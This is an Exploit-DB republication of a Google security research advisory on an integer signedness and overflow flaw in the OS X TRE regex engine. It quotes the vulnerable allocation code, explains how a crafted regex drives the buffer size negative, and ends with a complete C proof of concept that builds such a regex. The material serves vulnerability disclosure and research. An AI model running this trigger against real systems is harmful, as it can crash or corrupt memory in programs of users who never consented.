Apple Mac OSX Regex Engine (TRE) - Integer Signedness / Overflow

EDB-ID:

38262




Platform:

OSX

Date:

2015-09-22


Source:  https://code.google.com/p/google-security-research/issues/detail?id=429

The OS X regex engine function tre_tnfa_run_parallel contains the following code:

  int tbytes;
...
  if (!match_tags)
    num_tags = 0;
  else
    num_tags = tnfa->num_tags;

...
  {
    int rbytes, pbytes, total_bytes;
    char *tmp_buf;
    /* Compute the length of the block we need. */
    tbytes = sizeof(*tmp_tags) * num_tags;
    rbytes = sizeof(*reach_next) * (tnfa->num_states + 1);
    pbytes = sizeof(*reach_pos) * tnfa->num_states;
    total_bytes =
      (sizeof(long) - 1) * 4 /* for alignment paddings */
      + (rbytes + tbytes * tnfa->num_states) * 2 + tbytes + pbytes;

    DPRINT(("tre_tnfa_run_parallel, allocate %d bytes\n", total_bytes));
    /* Allocate the memory. */
#ifdef TRE_USE_ALLOCA
    buf = alloca(total_bytes);
#else /* !TRE_USE_ALLOCA */
    buf = xmalloc((unsigned)total_bytes);  <-- malloc is called, not alloca
#endif /* !TRE_USE_ALLOCA */
    if (buf == NULL)
      return REG_ESPACE;
    memset(buf, 0, (size_t)total_bytes);


num_states and num_tags are computed based on the requirements of the regex and it's quite easy to make them each >64k with a relatively small regex. Note that total_bytes is an int and part of its calculation is the product of num_states and num_tags.

The types here are all over the place and there's conversion between int, unsigned's and size_t.

The attached PoC causes total_bytes to become negative leading to total_bytes being sign-extended in the memset call.

Severity medium because I haven't looked for exposed attack surface yet, but this doesn't require any non-standard flags (only REG_EXTENDED which is almost always used.)

Proof of Concept:

//ianbeer

#include <pthread.h>
#include <regex.h>
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define DEFAULT_REG_FLAGS (REG_EXTENDED)

void* go(void* arg){
  unsigned int nesting_level = 20;
  size_t inner_size = nesting_level*2+10;
  char* inner = malloc(inner_size);

  memset(inner, '(', nesting_level);
  inner[nesting_level] = '\\';
  inner[nesting_level+1] = '1';
  memset(&inner[nesting_level+2], ')', nesting_level);
  inner[nesting_level*2+2] = '\x00';

  unsigned int n_captures = 0x1000;
  char* regex = malloc(n_captures * inner_size + 100);
  strcpy(regex, "f(o)o((b)a(r))");
  for (unsigned int i = 0; i < n_captures; i++) {
    strcat(regex, inner);
  }
  strcat(regex, "r\\1o|\\2f|\\3l|\\4");
  const char* match_against = "hellothar!";

  regex_t re;
  
  int err = regcomp (&re, regex, DEFAULT_REG_FLAGS);
  if (err == 0) {
    void* something = malloc(100);
    regexec (&re, match_against, 1, (regmatch_t*)something, DEFAULT_REG_FLAGS);
  }
  return NULL;
}

int main (int argc, char const** argv)
{
  go(NULL);
  return 0;
}